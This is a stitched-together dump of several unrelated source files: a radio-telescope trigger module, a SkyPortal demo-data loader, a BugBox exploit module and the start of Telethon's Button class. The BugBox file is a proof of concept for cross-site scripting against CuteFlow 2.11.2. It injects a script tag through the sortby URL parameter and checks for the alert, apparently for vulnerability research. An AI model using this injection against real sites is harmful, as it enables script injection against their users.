if pointing is None:
self.logger.error("No pointing information available - cannot trigger LOFAR")
# check if we are connected to the server
elif not self.have_lofar:
self.logger.error("No LOFAR Trigger connection available - cannot trigger LOFAR")
# do the trigger
else:
# create the full trigger and put on VO queue
lofar_trigger = {'dm': dm_to_send,
'dm_err': dm_err,
'width': width.to(u.ms).value, # ms
'snr': snr,
'flux': flux, # Jy
'ra': pointing.ra.deg, # decimal deg
'dec': pointing.dec.deg, # decimal deg
'cb': self.obs_config['beam'],
'sb': cluster_sb[mask][ind],
'ymw16': dmgal,
'semiMaj': 15, # arcmin, CB
'semiMin': 15, # arcmin, CB
'name': name,
'src_name': src_name,
'datetimesource': datetimesource,
'utc': utc_arr,
'tarr': cluster_time[mask][ind],
'importance': 0.1}
# add system parameters (dt, central freq (GHz), bandwidth (MHz))
lofar_trigger.update(sys_params)
self.logger.info("Sending LOFAR trigger to LOFAR Trigger system")
self.lofar_queue.put(lofar_trigger)
if self.have_vo:
self.logger.info("Sending same trigger to VOEvent system")
self.vo_queue.put(lofar_trigger)
else:
self.logger.error("No VOEvent Generator connection available - not sending VO trigger")
def _process_triggers(self):
"""
Read thresholds (DM, width, S/N) for clustering
Continuously read AMBER triggers from queue and start processing for known and/or new sources
"""
# set observation parameters
utc_start = Time(self.obs_config['startpacket'] / TIME_UNIT, format='unix')
datetimesource = self.obs_config['datetimesource']
dt = TSAMP.to(u.second).value
chan_width = (BANDWIDTH / float(NCHAN)).to(u.MHz).value
cent_freq = (self.obs_config['min_freq'] * u.MHz + 0.5 * BANDWIDTH).to(u.GHz).value
sys_params = {'dt': dt, 'delta_nu_MHz': chan_width, 'nu_GHz': cent_freq}
pointing = self._get_pointing()
dmgal = util.get_ymw16(self.obs_config['parset'], self.obs_config['beam'], self.logger)
# get known source dm and type
dm_src, src_type, src_name = self._get_source()
if src_type is not None:
thresh_src = {'dm_src': dm_src,
'src_type': src_type,
'src_name': src_name,
'dm_min': max(dm_src - self.dm_range, self.dm_min_global),
'dm_max': dm_src + self.dm_range,
'width_max': np.inf,
'snr_min': self.snr_min_global,
'pointing': pointing,
'dmgal': dmgal
}
self.logger.info("Setting {src_name} trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}".format(**thresh_src))
# set min and max DM for new sources with unknown DM
thresh_new = {'src_type': None,
'src_name': None,
'dm_min': max(dmgal * self.thresh_iquv['dm_frac_min'], self.dm_min_global),
'dm_max': np.inf,
'width_max': self.thresh_iquv['width_max'],
'snr_min': self.thresh_iquv['snr_min'],
'pointing': pointing,
'dmgal': dmgal
}
# if known source, check whether or not LOFAR triggering should be enabled for new sources
if src_type is not None and src_name in self.lofar_trigger_sources:
thresh_new['skip_lofar'] = not self.thresh_lofar['trigger_on_new_sources']
else:
thresh_new['skip_lofar'] = False
self.logger.info("Setting new source trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}, skip LOFAR "
"triggering={skip_lofar}".format(**thresh_new))
# main loop
while self.observation_running:
if self.amber_triggers:
                # Copy the triggers so the class-wide list can receive new triggers without losing any
with self.lock:
triggers = self.amber_triggers
self.amber_triggers = []
# check for header (always, because it is received once for every amber instance)
if not self.hdr_mapping:
for trigger in triggers:
if trigger.startswith('#'):
# read header, remove comment symbol
header = trigger.split()[1:]
self.logger.info("Received header: {}".format(header))
# Check if all required params are present and create mapping to col index
keys = ['beam_id', 'integration_step', 'time', 'DM', 'SNR']
for key in keys:
try:
self.hdr_mapping[key] = header.index(key)
except ValueError:
self.logger.error("Key missing from clusters header: {}".format(key))
self.hdr_mapping = {}
return
# header should be present now
if not self.hdr_mapping:
self.logger.error("First clusters received but header not found")
continue
# remove headers from triggers (i.e. any trigger starting with #)
triggers = [trigger for trigger in triggers if not trigger.startswith('#')]
# triggers is empty if only header was received
if not triggers:
self.logger.info("Only header received - Canceling processing")
continue
# split strings and convert to numpy array
try:
triggers = np.array(list(map(lambda val: val.split(), triggers)), dtype=float)
except Exception as e:
self.logger.error("Failed to process triggers: {}".format(e))
continue
# pick columns to feed to clustering algorithm
triggers_for_clustering = triggers[:, (self.hdr_mapping['DM'], self.hdr_mapping['SNR'],
self.hdr_mapping['time'], self.hdr_mapping['integration_step'],
self.hdr_mapping['beam_id'])]
# known source and new source triggering, in thread so clustering itself does not
# delay next run
# known source triggering
if src_type is not None:
self.threads['trigger_known_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_src)
self.threads['trigger_known_source'].start()
# new source triggering
self.threads['trigger_new_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_new)
self.threads['trigger_new_source'].start()
sleep(self.interval)
self.logger.info("Observation finished")
def _get_pointing(self):
"""
Get pointing of this CB from parset
:return: pointing SkyCoord
"""
# read parset
try:
parset = self.obs_config['parset']
except KeyError as e:
self.logger.error("Cannot read parset ({})".format(e))
return None
# read beam
try:
beam = self.obs_config['beam']
except KeyError as e:
self.logger.error("Cannot read beam from parset, setting CB to 0 ({})".format(e))
beam = 0
# read beam coordinates from parset
try:
key = "task.beamSet.0.compoundBeam.{}.phaseCenter".format(beam)
c1, c2 = ast.literal_eval(parset[key].replace('deg', ''))
c1 = c1 * u.deg
c2 = c2 * u.deg
except Exception as e:
self.logger.error("Could not parse pointing for CB{:02d} ({})".format(beam, e))
return None
# convert HA to RA if HADEC is used
if parset['task.directionReferenceFrame'].upper() == 'HADEC':
# Get RA at the mid point of the observation
timestamp = Time(parset['task.startTime']) + .5 * float(parset['task.duration']) * u.s
c1, c2 = util.radec_to_hadec(c1, c2, timestamp)
# create SkyCoord object
pointing = SkyCoord(c1, c2)
return pointing
def _load_parset(self, obs_config):
"""
Load the observation parset
:param dict obs_config: Observation config
:return: parset as dict
"""
try:
# encoded parset is already in config on master node
# decode the parset
raw_parset = util.decode_parset(obs_config['parset'])
# convert to dict and store
parset = util.parse_parset(raw_parset)
except KeyError:
self.logger.info("Observation parset not found in input config, looking for master parset")
# Load the parset from the master parset file
master_config_file = os.path.join(obs_config['master_dir'], 'parset', 'darc_master.parset')
try:
# Read raw config
with open(master_config_file) as f:
master_config = f.read().strip()
# Convert to dict
master_config = util.parse_parset(master_config)
# extract obs parset and decode
raw_parset = util.decode_parset(master_config['parset'])
parset = util.parse_parset(raw_parset)
except Exception as e:
self.logger.warning(
"Failed to load parset from master config file {}, "
"setting parset to None: {}".format(master_config_file, e))
parset = None
return parset
| [((45, 27, 45, 37), 'multiprocessing.Queue', 'mp.Queue', ({}, {}), '()', True, 'import multiprocessing as mp\n'), ((53, 20, 53, 29), 'multiprocessing.Lock', 'mp.Lock', ({}, {}), '()', True, 'import multiprocessing as mp\n'), ((56, 25, 56, 35), 'astropy.time.Time.now', 'Time.now', ({}, {}), '()', False, 'from astropy.time import Time, TimeDelta\n'), ((168, 37, 168, 84), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((196, 8, 196, 48), 'darc.VOEventQueueServer.register', 'VOEventQueueServer.register', ({(196, 36, 196, 47): '"""get_queue"""'}, {}), "('get_queue')", False, 'from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer\n'), ((201, 17, 201, 72), 'darc.VOEventQueueServer', 'VOEventQueueServer', (), '', False, 'from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer\n'), ((210, 8, 210, 53), 'darc.LOFARTriggerQueueServer.register', 'LOFARTriggerQueueServer.register', ({(210, 41, 210, 52): '"""get_queue"""'}, {}), "('get_queue')", False, 'from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer\n'), ((215, 17, 215, 77), 'darc.LOFARTriggerQueueServer', 'LOFARTriggerQueueServer', (), '', False, 'from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer\n'), ((283, 12, 288, 44), 'darc.external.tools.get_triggers', 'tools.get_triggers', (), '', False, 'from darc.external import tools\n'), ((314, 14, 314, 24), 'astropy.time.Time.now', 'Time.now', ({}, {}), '()', False, 'from astropy.time import Time, TimeDelta\n'), ((382, 11, 382, 23), 'numpy.any', 'np.any', ({(382, 18, 382, 22): 'mask'}, {}), '(mask)', True, 'import numpy as np\n'), ((462, 20, 462, 83), 'astropy.time.Time', 'Time', (), '', False, 'from astropy.time import Time, TimeDelta\n'), ((469, 16, 469, 95), 'darc.util.get_ymw16', 'util.get_ymw16', ({(469, 31, 469, 56): "self.obs_config['parset']", (469, 58, 469, 81): "self.obs_config['beam']", (469, 83, 469, 94): 'self.logger'}, {}), "(self.obs_config['parset'], self.obs_config['beam'], self.logger)", False, 'from darc import util\n'), ((608, 19, 608, 35), 'astropy.coordinates.SkyCoord', 'SkyCoord', ({(608, 28, 608, 30): 'c1', (608, 32, 608, 34): 'c2'}, {}), '(c1, c2)', False, 'from astropy.coordinates import SkyCoord\n'), ((71, 28, 71, 38), 'multiprocessing.Queue', 'mp.Queue', ({}, {}), '()', True, 'import multiprocessing as mp\n'), ((87, 31, 87, 41), 'multiprocessing.Queue', 'mp.Queue', ({}, {}), '()', True, 'import multiprocessing as mp\n'), ((291, 15, 291, 41), 'numpy.array', 'np.array', ({(291, 24, 291, 40): 'cluster_downsamp'}, {}), '(cluster_downsamp)', True, 'import numpy as np\n'), ((292, 22, 292, 43), 'numpy.array', 'np.array', ({(292, 31, 292, 42): 'cluster_snr'}, {}), '(cluster_snr)', True, 'import numpy as np\n'), ((293, 21, 293, 41), 'numpy.array', 'np.array', ({(293, 30, 293, 40): 'cluster_dm'}, {}), '(cluster_dm)', True, 'import numpy as np\n'), ((294, 23, 294, 45), 'numpy.array', 'np.array', ({(294, 32, 294, 44): 'cluster_time'}, {}), '(cluster_time)', True, 'import numpy as np\n'), ((383, 23, 383, 35), 'numpy.sum', 'np.sum', ({(383, 30, 383, 34): 'mask'}, {}), '(mask)', True, 'import numpy as np\n'), ((392, 18, 392, 46), 'numpy.argmax', 'np.argmax', ({(392, 28, 392, 45): 'cluster_snr[mask]'}, {}), '(cluster_snr[mask])', True, 'import numpy as np\n'), ((464, 13, 464, 31), 'darc.definitions.TSAMP.to', 'TSAMP.to', ({(464, 22, 464, 30): 'u.second'}, {}), '(u.second)', False, 'from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT\n'), ((572, 12, 572, 32), 
'time.sleep', 'sleep', ({(572, 18, 572, 31): 'self.interval'}, {}), '(self.interval)', False, 'from time import sleep\n'), ((606, 21, 606, 59), 'darc.util.radec_to_hadec', 'util.radec_to_hadec', ({(606, 41, 606, 43): 'c1', (606, 45, 606, 47): 'c2', (606, 49, 606, 58): 'timestamp'}, {}), '(c1, c2, timestamp)', False, 'from darc import util\n'), ((621, 25, 621, 65), 'darc.util.decode_parset', 'util.decode_parset', ({(621, 44, 621, 64): "obs_config['parset']"}, {}), "(obs_config['parset'])", False, 'from darc import util\n'), ((623, 21, 623, 50), 'darc.util.parse_parset', 'util.parse_parset', ({(623, 39, 623, 49): 'raw_parset'}, {}), '(raw_parset)', False, 'from darc import util\n'), ((98, 30, 98, 66), 'yaml.load', 'yaml.load', (), '', False, 'import yaml\n'), ((198, 28, 198, 64), 'yaml.load', 'yaml.load', (), '', False, 'import yaml\n'), ((212, 28, 212, 64), 'yaml.load', 'yaml.load', (), '', False, 'import yaml\n'), ((320, 35, 320, 88), 'astropy.time.TimeDelta', 'TimeDelta', (), '', False, 'from astropy.time import Time, TimeDelta\n'), ((395, 20, 395, 34), 'darc.definitions.TSAMP.to', 'TSAMP.to', ({(395, 29, 395, 33): 'u.ms'}, {}), '(u.ms)', False, 'from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT\n'), ((566, 53, 569, 88), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((605, 24, 605, 54), 'astropy.time.Time', 'Time', ({(605, 29, 605, 53): "parset['task.startTime']"}, {}), "(parset['task.startTime'])", False, 'from astropy.time import Time, TimeDelta\n'), ((627, 33, 627, 103), 'os.path.join', 'os.path.join', ({(627, 46, 627, 70): "obs_config['master_dir']", (627, 72, 627, 80): '"""parset"""', (627, 82, 627, 102): '"""darc_master.parset"""'}, {}), "(obs_config['master_dir'], 'parset', 'darc_master.parset')", False, 'import os\n'), ((295, 27, 295, 53), 'numpy.array', 'np.array', ({(295, 36, 295, 52): 'cluster_downsamp'}, {}), '(cluster_downsamp)', True, 'import numpy as np\n'), ((296, 21, 296, 41), 'numpy.array', 'np.array', ({(296, 30, 296, 40): 'cluster_sb'}, {}), '(cluster_sb)', True, 'import numpy as np\n'), ((297, 28, 297, 55), 'numpy.array', 'np.array', ({(297, 37, 297, 54): 'ncand_per_cluster'}, {}), '(ncand_per_cluster)', True, 'import numpy as np\n'), ((411, 35, 411, 94), 'astropy.time.TimeDelta', 'TimeDelta', (), '', False, 'from astropy.time import Time, TimeDelta\n'), ((560, 59, 563, 94), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((633, 32, 633, 64), 'darc.util.parse_parset', 'util.parse_parset', ({(633, 50, 633, 63): 'master_config'}, {}), '(master_config)', False, 'from darc import util\n'), ((635, 29, 635, 72), 'darc.util.decode_parset', 'util.decode_parset', ({(635, 48, 635, 71): "master_config['parset']"}, {}), "(master_config['parset'])", False, 'from darc import util\n'), ((636, 25, 636, 54), 'darc.util.parse_parset', 'util.parse_parset', ({(636, 43, 636, 53): 'raw_parset'}, {}), '(raw_parset)', False, 'from darc import util\n'), ((409, 40, 409, 59), 'darc.definitions.BANDWIDTH.to', 'BANDWIDTH.to', ({(409, 53, 409, 58): 'u.MHz'}, {}), '(u.MHz)', False, 'from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT\n'), ((397, 19, 397, 44), 'darc.util.get_flux', 'util.get_flux', ({(397, 33, 397, 36): 'snr', (397, 38, 397, 43): 'width'}, {}), '(snr, width)', False, 'from darc import util\n')] |
glenn2763/skyportal | tools/load_demo_data.py | 79dc11bfe08076d9c1f920bad85681ab001e22c8 | import datetime
import os
import subprocess
import base64
from pathlib import Path
import shutil
import pandas as pd
import signal
import requests
from baselayer.app.env import load_env
from baselayer.app.model_util import status, create_tables, drop_tables
from social_tornado.models import TornadoStorage
from skyportal.models import init_db, Base, DBSession, Source, User
from skyportal.model_util import setup_permissions, create_token
from skyportal.tests import api
from baselayer.tools.test_frontend import verify_server_availability
if __name__ == "__main__":
"""Insert test data"""
env, cfg = load_env()
basedir = Path(os.path.dirname(__file__)) / ".."
with status(f"Connecting to database {cfg['database']['database']}"):
init_db(**cfg["database"])
with status("Dropping all tables"):
drop_tables()
with status("Creating tables"):
create_tables()
for model in Base.metadata.tables:
print(" -", model)
with status(f"Creating permissions"):
setup_permissions()
with status(f"Creating dummy users"):
super_admin_user = User(
username="[email protected]", role_ids=["Super admin"]
)
group_admin_user = User(
username="[email protected]", role_ids=["Super admin"]
)
full_user = User(username="[email protected]", role_ids=["Full user"])
view_only_user = User(
username="[email protected]", role_ids=["View only"]
)
DBSession().add_all(
[super_admin_user, group_admin_user, full_user, view_only_user]
)
for u in [super_admin_user, group_admin_user, full_user, view_only_user]:
DBSession().add(
TornadoStorage.user.create_social_auth(u, u.username, "google-oauth2")
)
with status("Creating token"):
token = create_token(
[
"Manage groups",
"Manage sources",
"Upload data",
"Comment",
"Manage users",
],
super_admin_user.id,
"load_demo_data token",
)
def assert_post(endpoint, data):
response_status, data = api("POST", endpoint, data, token)
        if not (response_status == 200 and data["status"] == "success"):
            raise RuntimeError(
                f'API call to {endpoint} failed with status {response_status}: {data["message"]}'
)
return data
with status("Launching web app & executing API calls"):
try:
response_status, data = api("GET", "sysinfo", token=token)
app_already_running = True
except requests.ConnectionError:
app_already_running = False
web_client = subprocess.Popen(
["make", "run"], cwd=basedir, preexec_fn=os.setsid
)
server_url = f"http://localhost:{cfg['ports.app']}"
print()
print(f"Waiting for server to appear at {server_url}...")
try:
verify_server_availability(server_url)
print("App running - continuing with API calls")
with status("Creating dummy group & adding users"):
data = assert_post(
"groups",
data={
"name": "Stream A",
"group_admins": [
super_admin_user.username,
group_admin_user.username,
],
},
)
group_id = data["data"]["id"]
for u in [view_only_user, full_user]:
data = assert_post(
f"groups/{group_id}/users/{u.username}", data={"admin": False}
)
with status("Creating dummy instruments"):
data = assert_post(
"telescope",
data={
"name": "Palomar 1.5m",
"nickname": "P60",
"lat": 33.3633675,
"lon": -116.8361345,
"elevation": 1870,
"diameter": 1.5,
"group_ids": [group_id],
},
)
telescope1_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "P60 Camera",
"type": "phot",
"band": "optical",
"telescope_id": telescope1_id,
},
)
instrument1_id = data["data"]["id"]
data = assert_post(
"telescope",
data={
"name": "Nordic Optical Telescope",
"nickname": "NOT",
"lat": 28.75,
"lon": 17.88,
"elevation": 1870,
"diameter": 2.56,
"group_ids": [group_id],
},
)
telescope2_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "ALFOSC",
"type": "both",
"band": "optical",
"telescope_id": telescope2_id,
},
)
with status("Creating dummy sources"):
SOURCES = [
{
"id": "14gqr",
"ra": 353.36647,
"dec": 33.646149,
"redshift": 0.063,
"group_ids": [group_id],
"comments": [
"No source at transient location to R>26 in LRIS imaging",
"Strong calcium lines have emerged.",
],
},
{
"id": "16fil",
"ra": 322.718872,
"dec": 27.574113,
"redshift": 0.0,
"group_ids": [group_id],
"comments": ["Frogs in the pond", "The eagle has landed"],
},
]
(basedir / "static/thumbnails").mkdir(parents=True, exist_ok=True)
for source_info in SOURCES:
comments = source_info.pop("comments")
data = assert_post("sources", data=source_info)
assert data["data"]["id"] == source_info["id"]
for comment in comments:
data = assert_post(
"comment",
data={"source_id": source_info["id"], "text": comment},
)
phot_file = basedir / "skyportal/tests/data/phot.csv"
phot_data = pd.read_csv(phot_file)
data = assert_post(
"photometry",
data={
"source_id": source_info["id"],
"time_format": "iso",
"time_scale": "utc",
"instrument_id": instrument1_id,
"observed_at": phot_data.observed_at.tolist(),
"mag": phot_data.mag.tolist(),
"e_mag": phot_data.e_mag.tolist(),
"lim_mag": phot_data.lim_mag.tolist(),
"filter": phot_data["filter"].tolist(),
},
)
spec_file = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"skyportal",
"tests",
"data",
"spec.csv",
)
spec_data = pd.read_csv(spec_file)
for i, df in spec_data.groupby("instrument_id"):
data = assert_post(
"spectrum",
data={
"source_id": source_info["id"],
"observed_at": str(datetime.datetime(2014, 10, 24)),
"instrument_id": 1,
"wavelengths": df.wavelength.tolist(),
"fluxes": df.flux.tolist(),
},
)
for ttype in ["new", "ref", "sub"]:
fname = f'{source_info["id"]}_{ttype}.png'
fpath = basedir / f"skyportal/tests/data/{fname}"
thumbnail_data = base64.b64encode(
open(os.path.abspath(fpath), "rb").read()
)
data = assert_post(
"thumbnail",
data={
"source_id": source_info["id"],
"data": thumbnail_data,
"ttype": ttype,
},
)
source = Source.query.get(source_info["id"])
source.add_linked_thumbnails()
finally:
if not app_already_running:
print("Terminating web app")
os.killpg(os.getpgid(web_client.pid), signal.SIGTERM)
| [((22, 15, 22, 25), 'baselayer.app.env.load_env', 'load_env', ({}, {}), '()', False, 'from baselayer.app.env import load_env\n'), ((25, 9, 25, 72), 'baselayer.app.model_util.status', 'status', ({(25, 16, 25, 71): 'f"""Connecting to database {cfg[\'database\'][\'database\']}"""'}, {}), '(f"Connecting to database {cfg[\'database\'][\'database\']}")', False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((26, 8, 26, 34), 'skyportal.models.init_db', 'init_db', ({}, {}), "(**cfg['database'])", False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((28, 9, 28, 38), 'baselayer.app.model_util.status', 'status', ({(28, 16, 28, 37): '"""Dropping all tables"""'}, {}), "('Dropping all tables')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((29, 8, 29, 21), 'baselayer.app.model_util.drop_tables', 'drop_tables', ({}, {}), '()', False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((31, 9, 31, 34), 'baselayer.app.model_util.status', 'status', ({(31, 16, 31, 33): '"""Creating tables"""'}, {}), "('Creating tables')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((32, 8, 32, 23), 'baselayer.app.model_util.create_tables', 'create_tables', ({}, {}), '()', False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((37, 9, 37, 40), 'baselayer.app.model_util.status', 'status', ({(37, 16, 37, 39): 'f"""Creating permissions"""'}, {}), "(f'Creating permissions')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((38, 8, 38, 27), 'skyportal.model_util.setup_permissions', 'setup_permissions', ({}, {}), '()', False, 'from skyportal.model_util import setup_permissions, create_token\n'), ((40, 9, 40, 40), 'baselayer.app.model_util.status', 'status', ({(40, 16, 40, 39): 'f"""Creating dummy users"""'}, {}), "(f'Creating dummy users')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((41, 27, 43, 9), 'skyportal.models.User', 'User', (), '', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((44, 27, 46, 9), 'skyportal.models.User', 'User', (), '', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((47, 20, 47, 83), 'skyportal.models.User', 'User', (), '', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((48, 25, 50, 9), 'skyportal.models.User', 'User', (), '', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((60, 9, 60, 33), 'baselayer.app.model_util.status', 'status', ({(60, 16, 60, 32): '"""Creating token"""'}, {}), "('Creating token')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((61, 16, 71, 9), 'skyportal.model_util.create_token', 'create_token', ({(62, 12, 68, 13): "['Manage groups', 'Manage sources', 'Upload data', 'Comment', 'Manage users']", (69, 12, 69, 31): 'super_admin_user.id', (70, 12, 70, 34): '"""load_demo_data token"""'}, {}), "(['Manage groups', 'Manage sources', 'Upload data', 'Comment',\n 'Manage users'], super_admin_user.id, 'load_demo_data token')", False, 'from skyportal.model_util import setup_permissions, create_token\n'), ((74, 32, 74, 66), 'skyportal.tests.api', 'api', ({(74, 36, 74, 42): '"""POST"""', (74, 44, 74, 52): 'endpoint', (74, 54, 74, 58): 'data', (74, 60, 74, 65): 'token'}, {}), "('POST', endpoint, data, token)", False, 'from skyportal.tests import 
api\n'), ((81, 9, 81, 58), 'baselayer.app.model_util.status', 'status', ({(81, 16, 81, 57): '"""Launching web app & executing API calls"""'}, {}), "('Launching web app & executing API calls')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((23, 19, 23, 44), 'os.path.dirname', 'os.path.dirname', ({(23, 35, 23, 43): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((83, 36, 83, 70), 'skyportal.tests.api', 'api', (), '', False, 'from skyportal.tests import api\n'), ((96, 12, 96, 50), 'baselayer.tools.test_frontend.verify_server_availability', 'verify_server_availability', ({(96, 39, 96, 49): 'server_url'}, {}), '(server_url)', False, 'from baselayer.tools.test_frontend import verify_server_availability\n'), ((51, 8, 51, 19), 'skyportal.models.DBSession', 'DBSession', ({}, {}), '()', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((57, 16, 57, 86), 'social_tornado.models.TornadoStorage.user.create_social_auth', 'TornadoStorage.user.create_social_auth', ({(57, 55, 57, 56): 'u', (57, 58, 57, 68): 'u.username', (57, 70, 57, 85): '"""google-oauth2"""'}, {}), "(u, u.username, 'google-oauth2')", False, 'from social_tornado.models import TornadoStorage\n'), ((87, 25, 89, 13), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((99, 17, 99, 62), 'baselayer.app.model_util.status', 'status', ({(99, 24, 99, 61): '"""Creating dummy group & adding users"""'}, {}), "('Creating dummy group & adding users')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((117, 17, 117, 53), 'baselayer.app.model_util.status', 'status', ({(117, 24, 117, 52): '"""Creating dummy instruments"""'}, {}), "('Creating dummy instruments')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((167, 17, 167, 49), 'baselayer.app.model_util.status', 'status', ({(167, 24, 167, 48): '"""Creating dummy sources"""'}, {}), "('Creating dummy sources')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((56, 12, 56, 23), 'skyportal.models.DBSession', 'DBSession', ({}, {}), '()', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((204, 32, 204, 54), 'pandas.read_csv', 'pd.read_csv', ({(204, 44, 204, 53): 'phot_file'}, {}), '(phot_file)', True, 'import pandas as pd\n'), ((228, 32, 228, 54), 'pandas.read_csv', 'pd.read_csv', ({(228, 44, 228, 53): 'spec_file'}, {}), '(spec_file)', True, 'import pandas as pd\n'), ((256, 29, 256, 64), 'skyportal.models.Source.query.get', 'Source.query.get', ({(256, 46, 256, 63): "source_info['id']"}, {}), "(source_info['id'])", False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((261, 26, 261, 52), 'os.getpgid', 'os.getpgid', ({(261, 37, 261, 51): 'web_client.pid'}, {}), '(web_client.pid)', False, 'import os\n'), ((222, 40, 222, 65), 'os.path.dirname', 'os.path.dirname', ({(222, 56, 222, 64): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((234, 51, 234, 82), 'datetime.datetime', 'datetime.datetime', ({(234, 69, 234, 73): '2014', (234, 75, 234, 77): '10', (234, 79, 234, 81): '24'}, {}), '(2014, 10, 24)', False, 'import datetime\n'), ((245, 33, 245, 55), 'os.path.abspath', 'os.path.abspath', ({(245, 49, 245, 54): 'fpath'}, {}), '(fpath)', False, 'import os\n')] |
UncleWillis/BugBox | framework/Exploits/CUTEFLOW_0024.py | 25682f25fc3222db383649a4924bcd65f2ddcb34 |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0024",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/showmaillist.php?sortby=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
| [((27, 8, 27, 49), 'framework.Exploit.__init__', 'framework.Exploit.__init__', ({(27, 35, 27, 39): 'self', (27, 41, 27, 48): 'visible'}, {}), '(self, visible)', False, 'import framework\n'), ((45, 12, 45, 26), 'time.sleep', 'time.sleep', ({(45, 23, 45, 25): '(10)'}, {}), '(10)', False, 'import time\n')] |
HosseyNJF/Telethon | telethon/tl/custom/button.py | 0b0a1dc6a1a3f2fc8593526549889fba2884e8b8 | from .. import types
from ... import utils
class Button:
"""
.. note::
This class is used to **define** reply markups, e.g. when
sending a message or replying to events. When you access
`Message.buttons <telethon.tl.custom.message.Message.buttons>`
they are actually `MessageButton
<telethon.tl.custom.messagebutton.MessageButton>`,
so you might want to refer to that class instead.
Helper class to allow defining ``reply_markup`` when
sending a message with inline or keyboard buttons.
You should make use of the defined class methods to create button
    instances instead of making them yourself (i.e. don't do ``Button(...)``,
    but instead use methods like `Button.inline(...) <inline>` etc.).
You can use `inline`, `switch_inline`, `url` and `auth`
together to create inline buttons (under the message).
You can use `text`, `request_location`, `request_phone` and `request_poll`
together to create a reply markup (replaces the user keyboard).
You can also configure the aspect of the reply with these.
The latest message with a reply markup will be the one shown to the user
(messages contain the buttons, not the chat itself).
You **cannot** mix the two type of buttons together,
and it will error if you try to do so.
The text for all buttons may be at most 142 characters.
If more characters are given, Telegram will cut the text
to 128 characters and add the ellipsis (…) character as
the 129.
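    A minimal usage sketch (``client`` is assumed to be an already-connected,
    bot-authorized `TelegramClient <telethon.client.telegramclient.TelegramClient>`
    and ``chat`` any entity the bot may message); the markup is passed through
    the ``buttons=`` parameter when sending a message:
        from telethon import Button
        # One row of callback buttons, one row with a URL button
        await client.send_message(chat, 'Pick an option', buttons=[
            [Button.inline('Yes', b'yes'), Button.inline('No', b'no')],
            [Button.url('Documentation', 'https://docs.telethon.dev')]
        ])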
"""
def __init__(self, button, *, resize, single_use, selective):
self.button = button
self.resize = resize
self.single_use = single_use
self.selective = selective
@staticmethod
def _is_inline(button):
"""
Returns `True` if the button belongs to an inline keyboard.
"""
return isinstance(button, (
types.KeyboardButtonCallback,
types.KeyboardButtonSwitchInline,
types.KeyboardButtonUrl,
types.InputKeyboardButtonUrlAuth
))
@staticmethod
def inline(text, data=None):
"""
Creates a new inline button with some payload data in it.
If `data` is omitted, the given `text` will be used as `data`.
In any case `data` should be either `bytes` or `str`.
Note that the given `data` must be less or equal to 64 bytes.
If more than 64 bytes are passed as data, ``ValueError`` is raised.
If you need to store more than 64 bytes, consider saving the real
data in a database and a reference to that data inside the button.
When the user clicks this button, `events.CallbackQuery
<telethon.events.callbackquery.CallbackQuery>` will trigger with the
same data that the button contained, so that you can determine which
button was pressed.
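        A sketch of the full round trip (``client`` and ``chat`` are assumed
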